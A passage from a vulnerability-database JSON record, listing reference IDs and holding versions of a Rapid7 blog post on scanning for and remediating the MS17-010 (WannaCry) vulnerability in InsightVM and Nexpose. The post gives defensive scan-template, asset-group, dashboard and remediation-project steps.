["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "seebug", "idList": ["SSV:92950", "SSV:92952", "SSV:92964"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "cve", "idList": ["CVE-2014-6324", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20200909-01-WINDOWS", "HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-70958", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2014-1949", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:C529724ABA8784A9BB8018E330CF2E24", "THREATPOST:DDE60DEFF6FB6D90F1C25A3E79E4E02E", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "canvas", "idList": ["MS17_010", "MS14_068"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:CD55D97C4B7F0F15409E50C509B347D3", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "cert", "idList": ["VU:213119"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}], "modified": "2017-05-01T16:52:25", "rev": 2}}, "reporter": "Rebekah Brown", "bulletinFamily": "blog", "objectVersion": "1.5", "type": "rapid7community", "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"published": "2017-06-07T14:57:05", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2017-06-19T18:16:21", "rev": 2}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0101", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96704", "SMNTC-96706", "SMNTC-96709", "SMNTC-96625", "SMNTC-96707", "SMNTC-96703"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0203", "CPAI-2017-0419", "CPAI-2017-0177", "CPAI-2017-0200", "CPAI-2017-0205", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}], "modified": "2017-06-19T18:16:21", "rev": 2}}, "id": "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "objectVersion": "1.5", "title": "Scanning and Remediating WannaCry/MS17-010 in InsightVM and Nexpose", "bulletinFamily": "blog", "viewCount": 258, "reporter": "Nathan Palanov", "references": [], "enchantments_done": [], "type": "rapid7community", "_object_type": "robots.models.rss.RssBulletin", "history": [{"lastseen": "2017-05-25T17:57:11", "bulletin": {"published": "2017-05-22T15:17:48", "enchantments": {}, "id": "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "objectVersion": "1.4", "title": "Scanning and Remediating WannaCry/MS17-010 in InsightVM and Nexpose", "bulletinFamily": "blog", "viewCount": 26, "reporter": "Nathan Palanov", "references": [], "type": "rapid7community", "history": [], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "<!-- [DocumentBodyStart:f32fe863-cd13-4685-b0f5-aea5b4ded9f0] --><div class=\"jive-rendered-content\"><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>***Update 5/18/17: EternalBlue exploit (used in WannaCry attack) is now available in Metasploit for testing your compensating controls and validating remediations. More info: <a class=\"jive-link-blog-small\" data-containerId=\"1001\" data-containerType=\"37\" data-objectId=\"7880\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/metasploit/blog/2017/05/20/metasploit-the-power-of-the-community-and-eternalblue\">EternalBlue: Metasploit Module for MS17-010</a>. Also removed steps 5 and 6 from scan instructions as they were not strictly necessary and causing issues for some customers ***</strong></span></p><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>***Update 5/17/17: Unauthenticated remote checks have now been provided. </strong></span><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>For hosts that are locked down to prevent null or guest access an authenticated remote check has also been provided.</strong></span></p><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>The pre-existing instructions below will enable the remote checks on creation of the template.***</strong></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Today, security teams are starting their work week with a scramble to remediate MS17-010, in order to prevent the associated <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor\" target=\"_blank\">ransomware attack, WannaCry</a>, also known as Wanna Decryptor, WNCRY, and Wanna Decryptor 2.0 (how I miss the halcyon days when vulnerabilities had gentle names like Poodle). </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">With all of the WannaCry information circulating we want to keep this simple. First, check out this link to an <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7869\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/12/wanna-decryptor-wncry-ransomware-explained\">overview of the WannaCry ransomware vulnerability</a> written by <a class=\"jive-link-profile-small jiveTT-hover-user\" data-containerId=\"-1\" data-containerType=\"-1\" data-objectId=\"29826\" data-objectType=\"3\" href=\"https://community.rapid7.com/people/hrbrmstr\">Bob Rudis</a></span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, and then review the below steps to quickly scan for this vulnerability in your own infrastructure (if you aren&#8217;t already a customer, go </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">try out InsightVM for free</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> you can use this free trial to scan for this vulnerability across your environment), create a dynamic asset group to continuously see affected assets, as well as create a dynamic remediation project to track the progress of remediating WannaCry.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Here is the InsightVM/Nexpose step-by-step guide to create a scan template specifically to look for MS17-010:</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">1. Under the Administration tab, go to Templates &gt; Manage Templates</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66939/pastedImage_11.png\"><img class=\"image-1 jive-image\" height=\"276\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66939/754-276/pastedImage_11.png\" style=\" width: 754.425px;\" width=\"754\"/></a></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">2. Copy the following template: Full Audit enhanced logging without Web Spider. Don&#8217;t forget to give your copy a name and description; here, we&#8217;ll call it &ldquo;WNCRY Scan Template&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66940/pastedImage_12.png\"><img class=\"image-2 jive-image\" height=\"299\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66940/758-299/pastedImage_12.png\" style=\"width:758px; height: 301.367px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66944/pastedImage_13.png\"><img class=\"image-3 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66944/758-275/pastedImage_13.png\" style=\" width: 798.319px;\" width=\"758\"/></a></span></span><span><span><br/></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">3. Click on Vulnerability Checks and then &ldquo;By Individual Check&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66945/pastedImage_14.png\"><img class=\"jive-image image-4\" height=\"322\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66945/758-322/pastedImage_14.png\" style=\" width: 867.529px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">4. Add Check &ldquo;<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" target=\"_blank\">MS17-010</a>&#8221; and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66946/pastedImage_15.png\"><img class=\"image-5 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66946/758-275/pastedImage_15.png\" style=\" width:758px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should come back with 192 checks that are related to MS17-010. The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" target=\"_blank\">CVE-2017-0143</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" target=\"_blank\">CVE-2017-0144</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" target=\"_blank\">CVE-2017-0145</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" target=\"_blank\">CVE-2017-0146</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" target=\"_blank\">CVE-2017-0147</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">5. Save the template and run a scan to identify all assets with MS17-010.</span></h2><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2><span style=\"font-size: 18pt;\">Creating a Dynamic Asset Group for MS17-010</span></h2><p><span style=\"font-size: 12pt;\">Now that you have your assets scanned, you may want to create a Dynamic Asset Group to report/tag off of that will update itself whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\">InsightVM</a> console, just under the search button:<br/></span></p><p><span style=\"font-size: 12pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66963/pastedImage_34.png\"><img class=\"image-13 jive-image\" height=\"118\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66963/468-118/pastedImage_34.png\" style=\" width: 468.099px;\" width=\"468\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p dir=\"ltr\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</p><p dir=\"ltr\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66979/pastedImage_1.png\"><img class=\"image-16 jive-image\" height=\"477\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66979/pastedImage_1.png\" style=\"max-width:664px; max-\" width=\"664\"/></a></p><h2 dir=\"ltr\">Creating a WannaCry Dashboard</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">Recently, Ken Mizota posted an article on how to build a custom dashboard to </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #3f98d4;\">track your exposure to exploits from the Shadow Brokers leak</span></a><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">. If you already did that, you're good to go! If you wanted to be specific to WannaCry, you could use this Dashboard filter:</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0101\" OR <span style=\"color: #000000; font-family: Calibri; font-size: 16px; background-color: #f6f6f6;\">asset.vulnerability.title CONTAINS \"cve-2017-0146\"</span>asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\"</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">OR asset.vulnerability.title CONTAINS \"cve-2017-0102\"</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"font-size: 14pt;\"><strong>Creating a SQL Query Export</strong></span></p><p>@00jay kindly posted this handy discussion for details on using the SQL export in InsightVM/Nexpose: <a class=\"jive-link-thread-small\" data-containerId=\"2004\" data-containerType=\"14\" data-objectId=\"9963\" data-objectType=\"1\" href=\"https://community.rapid7.com/thread/9963\">WannaCry - Scanning &amp; Reporting</a> </p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Creating a Remediation Project for MS17-010:</h2><p>In InsightVM, you can also create a remediation project for MS17-010 to track the progress of remediation live. To do this, go to the &ldquo;Projects&#8221; tab and click &ldquo;Create a Project&#8221;:</p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66955/pastedImage_28.png\"><img class=\"image-11 jive-image\" height=\"174\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66955/758-174/pastedImage_28.png\" style=\" width: 988.531px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in \"vulnerability.alternateIds &lt;=&gt; ( altId = \"ms17-010\" )\"</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66977/pastedImage_2.png\"><img class=\"image-15 jive-image\" height=\"473\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66977/758-473/pastedImage_2.png\" style=\" width: 767.39px;\" width=\"758\"/></a></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability. </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. If you have JIRA, you can also configure the automatic ticketing integration between InsightVM and JIRA to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you&#8217;ll be able to quickly scan for the WannaCry vulnerability as well as ensure that the vulns are being remediated. If you have any questions please don&#8217;t hesitate to let us know!</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on WannaCry and ransomware, please visit this <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\">page</a>. </span></p></div><!-- [DocumentBodyEnd:f32fe863-cd13-4685-b0f5-aea5b4ded9f0] -->", "cvelist": ["CVE-2017-0101", "CVE-2017-0102", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "href": "https://community.rapid7.com/community/nexpose/blog/2017/05/17/scanning-and-remediating-wannacry-in-insightvm-and-nexpose", "modified": "2017-05-22T15:17:48", "lastseen": "2017-05-25T17:57:11"}, "differentElements": ["description", "cvelist", "published", "modified"], "edition": 6}, {"lastseen": "2017-05-17T14:49:14", "bulletin": {"published": "2017-05-17T13:59:04", "enchantments": {}, "id": "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "objectVersion": "1.4", "title": "Scanning and Remediating WannaCry/MS17-010 in InsightVM and Nexpose", "bulletinFamily": "blog", "viewCount": 11, "reporter": "Nathan Palanov", "references": [], "type": "rapid7community", "history": [], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "<!-- [DocumentBodyStart:c0f66ace-52ba-4423-a175-b0606ee06294] --><div class=\"jive-rendered-content\"><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"><span style=\"color: #000000; font-size: 11pt; font-family: Arial;\"><strong> </strong></span>&#160;</p><p><span style=\"font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong style=\"color: black;\">***Update 5/17/17: Unauthenticated remote checks have now been provided. </strong></span><span style=\"font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong style=\"color: black;\">For hosts that are locked down to prevent null or guest access an authenticated remote check has also been provided.</strong></span></p><p><span style=\"font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong style=\"color: black;\">The pre-existing instructions below will enable the remote checks on creation of the template.***</strong></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"><span style=\"color: #000000; font-size: 11pt; font-family: Arial;\"><strong> </strong></span>&#160;</p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Today, security teams are starting their work week with a scramble to remediate MS17-010, in order to prevent the associated <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor\" target=\"_blank\">ransomware attack, WannaCry</a>, also known as Wanna Decryptor, WNCRY, and Wanna Decryptor 2.0 (how I miss the halcyon days when vulnerabilities had gentle names like Poodle). </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">With all of the WannaCry information circulating we want to keep this simple. First, check out this link to an <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7869\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/12/wanna-decryptor-wncry-ransomware-explained\">overview of the WannaCry ransomware vulnerability</a> written by <a class=\"jive-link-profile-small jiveTT-hover-user\" data-containerId=\"-1\" data-containerType=\"-1\" data-objectId=\"29826\" data-objectType=\"3\" href=\"https://community.rapid7.com/people/hrbrmstr\">Bob Rudis</a></span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, and then review the below steps to quickly scan for this vulnerability in your own infrastructure (if you aren&#8217;t already a customer, go </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">try out InsightVM for free</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> you can use this free trial to scan for this vulnerability across your environment), create a dynamic asset group to continuously see affected assets, as well as create a dynamic remediation project to track the progress of remediating WannaCry.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Here is the InsightVM/Nexpose step-by-step guide to create a scan template specifically to look for MS17-010:</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">1. Under the Administration tab, go to Templates &gt; Manage Templates</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66939/pastedImage_11.png\"><img class=\"image-1 jive-image\" height=\"276\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66939/754-276/pastedImage_11.png\" style=\" width: 754.425px;\" width=\"754\"/></a></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">2. Copy the following template: Full Audit enhanced logging without Web Spider. Don&#8217;t forget to give your copy a name and description; here, we&#8217;ll call it &ldquo;WNCRY Scan Template&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: 